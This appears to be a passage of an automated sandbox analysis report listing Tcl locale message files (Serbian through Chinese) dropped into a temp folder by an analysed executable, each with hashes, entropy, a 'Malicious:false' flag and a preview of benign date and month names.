                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \. "Die"\. "H\u00ebn"\. "Mar"\. "M\u00ebr"\. "Enj"\. "Pre"\. "Sht"]. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \. "e diel"\. "e h\u00ebn\u00eb"\. "e mart\u00eb"\. "e m\u00ebrkur\u00eb"\. "e enjte"\. "e premte"\. "e shtun\u00eb"]. ::msgcat::mcset sq MONTHS_ABBREV [list \. "Jan"\. "Shk"\. "Mar"\. "Pri"\. "Maj"\. "Qer"\. "Kor"\. "Gsh"\. "Sht"\. "Tet"\. "N\u00ebn"\. "Dhj"\. ""]. ::msgcat::mcset sq MONTHS_FULL [list \. "janar"\. "shkurt"\. "mars"\. "prill"\. "maj"\. "qershor"\. "korrik"\. "gusht"\. "shtator"\. "tetor"\. "n\u00ebntor"\. "dhjetor"\. ""]. ::msgcat::mcset sq BCE "p.e.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\sr.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2035
                                                                                                                                                                                                                                                    Entropy (8bit):4.24530896413441
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46qoQCSdQqQP4QSsIVKP10NupiuQxQaQLlKnM28nGtfR:hjIX15VKP6NmBU3YKnFbp
                                                                                                                                                                                                                                                    MD5:5CA16D93718AAA813ADE746440CF5CE6
                                                                                                                                                                                                                                                    SHA1:A142733052B87CA510B8945256399CE9F873794C
                                                                                                                                                                                                                                                    SHA-256:313E8CDBBC0288AED922B9927A7331D0FAA2E451D4174B1F5B76C5C9FAEC8F9B
                                                                                                                                                                                                                                                    SHA-512:4D031F9BA75D45EC89B2C74A870CCDA41587650D7F9BC91395F68B70BA3CD7A7105E70C19D139D20096533E06F5787C00EA850E27C4ADCF5A28572480D39B639
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \. "\u041d\u0435\u0434"\. "\u041f\u043e\u043d"\. "\u0423\u0442\u043e"\. "\u0421\u0440\u0435"\. "\u0427\u0435\u0442"\. "\u041f\u0435\u0442"\. "\u0421\u0443\u0431"]. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \. "\u041d\u0435\u0434\u0435\u0459\u0430"\. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\. "\u0423\u0442\u043e\u0440\u0430\u043a"\. "\u0421\u0440\u0435\u0434\u0430"\. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\. "\u041f\u0435\u0442\u0430\u043a"\. "\u0421\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset sr MONTHS_ABBREV [list \. "\u0408\u0430\u043d"\. "\u0424\u0435\u0431"\. "\u041c\u0430\u0440"\. "\u0410\u043f\u0440"\. "\u041c\u0430\u0458"\. "\u0408\u0443\u043d"\. "\u0408\u0443\u043b"\.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\sv.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1167
                                                                                                                                                                                                                                                    Entropy (8bit):4.2825791311526515
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8JLmAQVm/xTsS9CfxTlijQkcjKxFvivn:46hVQc/psJxT8kyhkn
                                                                                                                                                                                                                                                    MD5:496D9183E2907199056CA236438498E1
                                                                                                                                                                                                                                                    SHA1:D9C3BB4AEBD9BFD942593694E796A8C2FB9217B8
                                                                                                                                                                                                                                                    SHA-256:4F32E1518BE3270F4DB80136FAC0031C385DD3CE133FAA534F141CF459C6113A
                                                                                                                                                                                                                                                    SHA-512:FA7FDEDDC42C36D0A60688CDBFE9A2060FE6B2644458D1EBFC817F1E5D5879EB3E3C78B5E53E9D3F42E2E4D84C93C4A7377170986A437EFF404F310D1D72F135
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \. "s\u00f6"\. "m\u00e5"\. "ti"\. "on"\. "to"\. "fr"\. "l\u00f6"]. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \. "s\u00f6ndag"\. "m\u00e5ndag"\. "tisdag"\. "onsdag"\. "torsdag"\. "fredag"\. "l\u00f6rdag"]. ::msgcat::mcset sv MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset sv MONTHS_FULL [list \. "januari"\. "februari"\. "mars"\. "april"\. "maj"\. "juni"\. "juli"\. "augusti"\. "september"\. "oktober"\. "november"\. "december"\. ""]. ::msgcat::mcset sv BCE "f.Kr.". ::msgcat::mcset sv C

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\sw.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):991
                                                                                                                                                                                                                                                    Entropy (8bit):4.024338627988864
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8r4mc4Go/4mtVfqRvodJ3fjESBToOqe3lHvFgdF6A3ixTZ6OM5mSYoC6Vy:4azu88kGDiq1qhbJ75V9gZSpgmSm9
                                                                                                                                                                                                                                                    MD5:4DB24BA796D86ADF0441D2E75DE0C07E
                                                                                                                                                                                                                                                    SHA1:9935B36FF2B1C6DFDE3EC375BC471A0E93D1F7E3
                                                                                                                                                                                                                                                    SHA-256:6B5AB8AE265DB436B15D32263A8870EC55C7C0C07415B3F9BAAC37F73BC704E5
                                                                                                                                                                                                                                                    SHA-512:BE7ED0559A73D01537A1E51941ED19F0FEC3F14F9527715CB119E89C97BD31CC6102934B0349D8D0554F5EDD9E3A02978F7DE4919C000A77BD353F7033A4A95B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \. "Jpi"\. "Jtt"\. "Jnn"\. "Jtn"\. "Alh"\. "Iju"\. "Jmo"]. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \. "Jumapili"\. "Jumatatu"\. "Jumanne"\. "Jumatano"\. "Alhamisi"\. "Ijumaa"\. "Jumamosi"]. ::msgcat::mcset sw MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Ago"\. "Sep"\. "Okt"\. "Nov"\. "Des"\. ""]. ::msgcat::mcset sw MONTHS_FULL [list \. "Januari"\. "Februari"\. "Machi"\. "Aprili"\. "Mei"\. "Juni"\. "Julai"\. "Agosti"\. "Septemba"\. "Oktoba"\. "Novemba"\. "Desemba"\. ""]. ::msgcat::mcset sw BCE "KK". ::msgcat::mcset sw CE "BK".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ta.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1835
                                                                                                                                                                                                                                                    Entropy (8bit):4.018233695396
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu83w0xn8dnzhmmlmYgtg+CKf6CO5ztFSLt8tCtGtv+CKf6CO5ztFSLt8tCtNu:46k0dgmmlmYgtE/t1H
                                                                                                                                                                                                                                                    MD5:2D9C969318D1740049D28EBBD4F62C1D
                                                                                                                                                                                                                                                    SHA1:121665081AFC33DDBCF679D7479BF0BC47FEF716
                                                                                                                                                                                                                                                    SHA-256:30A142A48E57F194ECC3AA9243930F3E6E1B4E8B331A8CDD2705EC9C280DCCBB
                                                                                                                                                                                                                                                    SHA-512:7C32907C39BFB89F558692535041B2A7FA18A64E072F5CF9AB95273F3AC5A7C480B4F953B13484A07AA4DA822613E27E78CC7B02ACE7A61E58FDB5507D7579C3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\. "\u0b9a\u0ba9\u0bbf"]. ::msgcat::mcset ta MONTHS_ABBREV [list \. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\. "\u0bae\u0bc7"\. "\u0b9c\u0bc2\u0ba9\u0bcd"\. "\u0b9c\u0bc2\u0bb2\u0bc8"\. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\. "\u0ba8\u0bb

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\ta_in.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.815592015875268
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmosDv+9/LosK3v6rZosDo+3v+6f6HK:4EnLzu8eDvWbK3v6r5DF3vmq
                                                                                                                                                                                                                                                    MD5:293456B39BE945C55536A5DD894787F0
                                                                                                                                                                                                                                                    SHA1:94DEF0056C7E3082E58266BCE436A61C045EA394
                                                                                                                                                                                                                                                    SHA-256:AA57D5FB5CC3F59EC6A3F99D7A5184403809AA3A3BC02ED0842507D4218B683D
                                                                                                                                                                                                                                                    SHA-512:AB763F2932F2FF48AC18C8715F661F7405607E1818B53E0D0F32184ABE67714F03A39A9D0637D0D93CE43606C3E1D702D2A3F8660C288F61DFE852747B652B59
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\te.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2102
                                                                                                                                                                                                                                                    Entropy (8bit):4.034298184367717
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46x9mcib30Rgu1je5YdnULEP8l1je5YdnULEPt:hnIb39ufbufV
                                                                                                                                                                                                                                                    MD5:0B9B124076C52A503A906059F7446077
                                                                                                                                                                                                                                                    SHA1:F43A0F6CCBDDBDD5EA140C7FA55E9A82AB910A03
                                                                                                                                                                                                                                                    SHA-256:42C34D02A6079C4D0D683750B3809F345637BC6D814652C3FB0B344B66B70C79
                                                                                                                                                                                                                                                    SHA-512:234B9ACA1823D1D6B82583727B4EA68C014D59916B410CB9B158FA1954B6FC3767A261BD0B9F592AF0663906ADF11C2C9A3CC0A325CB1FF58F42A884AF7CB015
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \. "\u0c06\u0c26\u0c3f"\. "\u0c38\u0c4b\u0c2e"\. "\u0c2e\u0c02\u0c17\u0c33"\. "\u0c2c\u0c41\u0c27"\. "\u0c17\u0c41\u0c30\u0c41"\. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\. "\u0c36\u0c28\u0c3f"]. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"]. ::msgcat::mcset te MONTHS_ABBREV [list \. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\. "\u0c2e\u0c3e\u0c30\u0c4d\u0c1a\u

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\te_in.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):411
                                                                                                                                                                                                                                                    Entropy (8bit):5.01781242466238
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8CjZWsn0sEjoD0sLvUFS3v6r5F3vMq:4azu84Z1nnEjoDnLvUFEvS5NvMq
                                                                                                                                                                                                                                                    MD5:443E34E2E2BC7CB64A8BA52D99D6B4B6
                                                                                                                                                                                                                                                    SHA1:D323C03747FE68E9B73F7E5C1E10B168A40F2A2F
                                                                                                                                                                                                                                                    SHA-256:88BDAF4B25B684B0320A2E11D3FE77DDDD25E3B17141BD7ED1D63698C480E4BA
                                                                                                                                                                                                                                                    SHA-512:5D8B267530EC1480BF3D571AABC2DA7B4101EACD7FB03B49049709E39D665DD7ACB66FD785BA2B5203DDC54C520434219D2D9974A1E9EE74C659FFAEA6B694E0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28". ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28". ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y". ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\th.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2305
                                                                                                                                                                                                                                                    Entropy (8bit):4.324407451316591
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46P4QX/wQT0H/u3rPc8JD57XWWND8QM70xJi53Ljtef:hQ556rVDWZcLOO
                                                                                                                                                                                                                                                    MD5:D145F9DF0E339A2538662BD752F02E16
                                                                                                                                                                                                                                                    SHA1:AFD97F8E8CC14D306DEDD78F8F395738E38A8569
                                                                                                                                                                                                                                                    SHA-256:F9641A6EBE3845CE5D36CED473749F5909C90C52E405F074A6DA817EF6F39867
                                                                                                                                                                                                                                                    SHA-512:E17925057560462F730CF8288856E46FA1F1D2A10B5D4D343257B7687A3855014D5C65B6C85AC55A7C77B8B355DB19F053C74B91DFA7BE7E9F933D9D4DA117F7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \. "\u0e2d\u0e32."\. "\u0e08."\. "\u0e2d."\. "\u0e1e."\. "\u0e1e\u0e24."\. "\u0e28."\. "\u0e2a."]. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"]. ::msgcat::mcset th MONTHS_ABBREV [list \. "\u0e21.\u0e04."\. "\u0e01.\u0e1e."\. "\u0e21\u0e35.\u0e04."\. "\u0e40\u0e21.\u0e22."\. "\u0e1e.\u0e04."\. "\u0e21\u0e34.\u0e22."\. "\

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\tr.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1133
                                                                                                                                                                                                                                                    Entropy (8bit):4.32041719596907
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu80VAFVsNTib5vk5CfYTnGk65GmogWFLNvoKvWI3:46j8NTgwVTnlSJWFLJvWI3
                                                                                                                                                                                                                                                    MD5:3AFAD9AD82A9C8B754E2FE8FC0094BAB
                                                                                                                                                                                                                                                    SHA1:4EE3E2DF86612DB314F8D3E7214D7BE241AA1A32
                                                                                                                                                                                                                                                    SHA-256:DF7C4BA67457CB47EEF0F5CA8E028FF466ACDD877A487697DC48ECAC7347AC47
                                                                                                                                                                                                                                                    SHA-512:79A6738A97B7DB9CA4AE9A3BA1C3E56BE9AC67E71AE12154FD37A37D78892B6414A49E10E007DE2EB314942DC017B87FAB7C64B74EC9B889DAEBFF9B3B78E644
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \. "Paz"\. "Pzt"\. "Sal"\. "\u00c7ar"\. "Per"\. "Cum"\. "Cmt"]. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \. "Pazar"\. "Pazartesi"\. "Sal\u0131"\. "\u00c7ar\u015famba"\. "Per\u015fembe"\. "Cuma"\. "Cumartesi"]. ::msgcat::mcset tr MONTHS_ABBREV [list \. "Oca"\. "\u015eub"\. "Mar"\. "Nis"\. "May"\. "Haz"\. "Tem"\. "A\u011fu"\. "Eyl"\. "Eki"\. "Kas"\. "Ara"\. ""]. ::msgcat::mcset tr MONTHS_FULL [list \. "Ocak"\. "\u015eubat"\. "Mart"\. "Nisan"\. "May\u0131s"\. "Haziran"\. "Temmuz"\. "A\u011fustos"\. "Eyl\u00fcl"\. "Ekim"\. "Kas\u0131m"\. "Aral\u0131k"\. ""]. ::msgcat::mcset tr D

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\uk.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2113
                                                                                                                                                                                                                                                    Entropy (8bit):4.227105489438195
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:46+ytFoQAQPHUKPo6eQ4QBuQ0WbQcJeyFQDWZlQD1QbS7XQn1Q7mDaSAJQ7GMLzM:hIpP5tzYhTUhAgEAE+
                                                                                                                                                                                                                                                    MD5:458A38F894B296C83F85A53A92FF8520
                                                                                                                                                                                                                                                    SHA1:CE26187875E334C712FDAB73E6B526247C6FE1CF
                                                                                                                                                                                                                                                    SHA-256:CF2E78EF3322F0121E958098EF5F92DA008344657A73439EAC658CB6BF3D72BD
                                                                                                                                                                                                                                                    SHA-512:3B8730C331CF29EF9DEDBC9D5A53C50D429931B8DA01EE0C20DAE25B995114966DB9BC576BE0696DEC088DB1D88B50DE2C376275AB5251F49F6544E546BBC531
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0434"\. "\u043f\u043d"\. "\u0432\u0442"\. "\u0441\u0440"\. "\u0447\u0442"\. "\u043f\u0442"\. "\u0441\u0431"]. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \. "\u043d\u0435\u0434\u0456\u043b\u044f"\. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\. "\u0441\u0435\u0440\u0435\u0434\u0430"\. "\u0447\u0435\u0442\u0432\u0435\u0440"\. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\. "\u0441\u0443\u0431\u043e\u0442\u0430"]. ::msgcat::mcset uk MONTHS_ABBREV [list \. "\u0441\u0456\u0447"\. "\u043b\u044e\u0442"\. "\u0431\u0435\u0440"\. "\u043a\u0432\u0456\u0442"\. "\u0442\u0440\u0430\u0432"\. "\u0447\u0435\u0440\u0432"\. "\u043b\u0438\u043f"\. "\

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\vi.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                                                                    Entropy (8bit):4.382223858419589
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8pNu9UT5xDHy2W82yGWnf/oxHFBSWWS1D/avSv16:46Oixzy2IyhwZ17cU16
                                                                                                                                                                                                                                                    MD5:3BD0AB95976D1B80A30547E4B23FD595
                                                                                                                                                                                                                                                    SHA1:B3E5DC095973E46D8808326B2A1FC45046B5267F
                                                                                                                                                                                                                                                    SHA-256:9C69094C0BD52D5AE8448431574EAE8EE4BE31EC2E8602366DF6C6BF4BC89A58
                                                                                                                                                                                                                                                    SHA-512:2A68A7ADC385EDEA02E4558884A24DCC6328CC9F7D459CC03CC9F2D2F58CF6FF2103AD5B45C6D05B7E13F28408C6B05CDDF1DF60E822E5095F86A49052E19E59
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \. "Th 2"\. "Th 3"\. "Th 4"\. "Th 5"\. "Th 6"\. "Th 7"\. "CN"]. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \. "Th\u01b0\u0301 hai"\. "Th\u01b0\u0301 ba"\. "Th\u01b0\u0301 t\u01b0"\. "Th\u01b0\u0301 n\u0103m"\. "Th\u01b0\u0301 s\u00e1u"\. "Th\u01b0\u0301 ba\u0309y"\. "Chu\u0309 nh\u00e2\u0323t"]. ::msgcat::mcset vi MONTHS_ABBREV [list \. "Thg 1"\. "Thg 2"\. "Thg 3"\. "Thg 4"\. "Thg 5"\. "Thg 6"\. "Thg 7"\. "Thg 8"\. "Thg 9"\. "Thg 10"\. "Thg 11"\. "Thg 12"\. ""]. ::msgcat::mcset vi MONTHS_FULL [list \. "Th\u00e1ng m\u00f4\u0323t"\. "Th\u00e1ng hai"\. "Th\u00e1ng ba"\. "Th\u00e1ng t\u01b0"\. "Th\u00e1ng n\u0103m"\. "Th\u00e1ng s\

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\zh.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1598)
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3330
                                                                                                                                                                                                                                                    Entropy (8bit):4.469203967086526
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:468jDI/Tw71xDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyzag29dL:hn7wRdNL
                                                                                                                                                                                                                                                    MD5:9C33FFDD4C13D2357AB595EC3BA70F04
                                                                                                                                                                                                                                                    SHA1:A87F20F7A331DEFC33496ECDA50D855C8396E040
                                                                                                                                                                                                                                                    SHA-256:EF81B41EC69F67A394ECE2B3983B67B3D0C8813624C2BFA1D8A8C15B21608AC9
                                                                                                                                                                                                                                                    SHA-512:E31EEE90660236BCD958F3C540F56B2583290BAD6086AE78198A0819A92CF2394C62DE3800FDDD466A8068F4CABDFBCA46A648D419B1D0103381BF428D721B13
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
